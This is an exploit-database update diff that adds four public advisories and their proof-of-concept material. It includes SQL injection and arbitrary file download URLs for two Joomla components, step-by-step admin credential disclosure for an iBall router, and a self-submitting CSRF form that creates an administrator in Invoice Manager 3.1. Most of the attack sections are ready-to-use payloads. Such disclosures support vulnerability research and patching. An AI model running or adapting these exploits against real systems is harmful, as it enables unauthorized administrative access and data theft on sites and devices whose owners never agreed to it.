DB: 2017-08-31

4 new exploits

Joomla! Component Quiz Deluxe 3.7.4 - SQL Injection
Joomla! Component Joomanager 2.0.0 - Arbitrary File Download
iBall Baton 150M Wireless Router - Authentication Bypass
Invoice Manager 3.1 - Cross-Site Request Forgery (Add Admin)

files.csv

@@ -38373,3 +38373,7 @@ id,file,description,date,author,platform,type,port
 42584,platforms/php/webapps/42584.txt,"User Login and Management - Multiple Vulnerabilities",2017-08-29,"Ali BawazeEer",php,webapps,0
 42585,platforms/php/webapps/42585.txt,"PHP Video Battle Script 1.0 - SQL Injection",2017-08-28,"Ihsan Sencan",php,webapps,0
 42588,platforms/hardware/webapps/42588.txt,"Brickcom IP Camera - Credentials Disclosure",2017-08-29,"Emiliano Ipar",hardware,webapps,0
+42589,platforms/php/webapps/42589.txt,"Joomla! Component Quiz Deluxe 3.7.4 - SQL Injection",2017-08-30,"Ihsan Sencan",php,webapps,0
+42590,platforms/php/webapps/42590.txt,"Joomla! Component Joomanager 2.0.0 - Arbitrary File Download",2017-08-30,"Ihsan Sencan",php,webapps,0
+42591,platforms/php/webapps/42591.txt,"iBall Baton 150M Wireless Router - Authentication Bypass",2017-03-07,Indrajith.A.N,php,webapps,0
+42592,platforms/php/webapps/42592.html,"Invoice Manager 3.1 - Cross-Site Request Forgery (Add Admin)",2017-08-30,"Ali BawazeEer",php,webapps,0

platforms/php/webapps/42589.txt

@@ -0,0 +1,26 @@
+# # # # # 
+# Exploit Title: Joomla! Component Quiz Deluxe 3.7.4 - SQL Injection
+# Dork: N/A
+# Date: 30.08.2017
+# Vendor Homepage: http://joomplace.com/
+# Software Link: https://extensions.joomla.org/extensions/extension/living/education-a-culture/quiz-deluxe/
+# Demo: http://demo30.joomplace.com/our-products/joomla-quiz-deluxe
+# Version: 3.7.4
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 	
+# Proof of Concept:
+# 
+# http://localhost/[PATH]/index.php?option=com_joomlaquiz&task=ajaxaction.flag_question&tmpl=component&stu_quiz_id=[SQL]
+# http://localhost/[PATH]/index.php?option=com_joomlaquiz&task=ajaxaction.flag_question&tmpl=component&flag_quest=[SQL]
+#
+# Etc..
+# # # # #

platforms/php/webapps/42590.txt

@@ -0,0 +1,25 @@
+# # # # # 
+# Exploit Title: Joomla! Component Joomanager 2.0.0 - Arbitrary File Download
+# Dork: N/A
+# Date: 30.08.2017
+# Vendor Homepage: http://www.joomanager.com/
+# Software Link: https://extensions.joomla.org/extensions/extension/vertical-markets/real-estate/joomanager/
+# Demo: http://www.joomanager.com/demo/realestate
+# Version: 2.0.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The security obligation allows an attacker to arbitrary download files..
+# 	
+# Proof of Concept:
+# 
+# http://localhost/[PATH]/index.php?option=com_joomanager&controller=details&task=download&path=[FILE]
+# 
+# Etc..
+# # # # #

platforms/php/webapps/42591.txt

@@ -0,0 +1,74 @@
+Title:
+====
+iball Baton 150M Wireless router - Authentication Bypass
+
+Credit:
+======
+Name: Indrajith.A.N
+Website: https://www.indrajithan.com
+
+Date:
+====
+07-03-2017
+
+Vendor:
+======
+iball Envisioning the tremendous potential for innovative products required
+by the ever evolving users in computing and digital world, iBall was
+launched in September 2001 and which is one of the leading networking
+company
+
+Product:
+=======
+iball Baton 150M Wireless-N ADSI.2+ Router
+
+Product link:
+http://www.iball.co.in/Product/150M-Wireless-N-Broadband-Router/539
+
+Abstract:
+=======
+iball Baton 150M Router's login page is insecurely developed that any
+attacker could bypass the admin's authentication just by tweaking the
+password.cgi file.
+
+Affected Version:
+=============
+Firmware Version : 1.2.6 build 110401 Rel.47776n
+Hardware Version : iB-WRA150N v1 00000001
+
+Exploitation-Technique:
+===================
+Remote
+
+Severity Rating:
+===================
+9
+
+Details:
+=======
+Any attacker can escalate his privilege to admin using this vulnerability.
+
+Proof Of Concept:
+================
+1) Navigate to Routers Login page which is usually IPV4 default Gateway IP,
+i.e 172.20.174.1
+
+2) Now just append password.cgi to the URL i.e
+http://172.20.174.1/password.cgi
+
+3) Right-click and View Source code which disclsus the username, password
+and user role of the admin in the comment section
+
+4) Successfully logged in using the disclosed credentials.
+
+Reference:
+=========
+Video POC :
+https://drive.google.com/file/d/0B6715xUqH18MS1J5Sk13emFkQmc/view?usp=sharing
+
+Disclosure Timeline:
+======================================
+Vendor Notification: March 5, 2017
+
+-----
+Indrajith.A.N

platforms/php/webapps/42592.html

@@ -0,0 +1,73 @@
+# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 
+
+<!-- 
+# Exploit Title: Invoice Manager v3.1 - Cross site request forgery (Add Admin)
+# Exploit Author: Ali BawazeEer || https://sa.linkedin.com/in/alibawazeeer
+# Dork: inurl:controller=pjAdmin
+# Date: 30.08.2017
+# Homepage: https://www.phpjabbers.com/invoice-manager/
+# Software Demo Link: http://demo.phpjabbers.com/1504048815_513/index.php?controller=pjAdmin&action=pjActionLogin
+# Version: 3.1
+# Category: Webapps /php 
+# Tested on: mozila firefox 
+# 
+#
+-->
+
+# ========================================================
+#
+#
+# Invoice Manager v3.1 Cross site request forgery (Add Admin)
+# 
+# Description : Invoice Manager v3.1 is vulnerable to CSRF attack (No CSRF token in place) which if an admin user can be
+# tricked to visit a crafted URL created by attacker (via spear phishing/social engineering).
+# Once exploited, the attacker can login as the admin using the email and the password in the below exploit.
+#
+#
+# ======================CSRF POC (Adding New user with Administrator Privileges)==================================
+
+
+<html>
+<body>
+<form name="csrf_form" action="http://localhost/invoice/index.php?controller=pjAdminUsers&action=pjActionCreate" method="post">
+
+<input name="user_create" id="user_create" value="1" type="hidden">
+<input name="role_id" id="role_id" value="1" type="hidden" >
+<input name="email" id="email" value="AliBawazeEer@localhost.com" type="hidden">
+<input name="password" id="password" value="12341234" type="hidden">
+<input name="name" id="name" value="Ali BawazeEer" type="hidden">
+<input name="phone" id="phone" value="911911911" type="hidden">
+<input name="status" id="status" value="T" type="hidden">
+<script type="text/javascript">document.csrf_form.submit();</script>
+</body>
+</html>
+
+# =================================================EOF =======================================================
+#
+#
+# Risk : attackers are able to gain full access to the administrator panel after chaning the password for the admin
+# and thus have total control over the web application, including content change,and change user's account download backup of the site access to user's data..
+#
+#
+# Remedy : developer should implement CSRF token for each request  
+#
+#
+#
+# ========================================================
+# [+] Disclaimer
+#
+# Permission is hereby granted for the redistribution of this advisory,
+# provided that it is not altered except by reformatting it, and that due
+# credit is given. Permission is explicitly given for insertion in
+# vulnerability databases and similar, provided that due credit is given to
+# the author. The author is not responsible for any misuse of the information contained 
+# herein and prohibits any malicious use of all security related information
+# or exploits by the author or elsewhere.
+#
+#
+# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 
+
+
+
+
+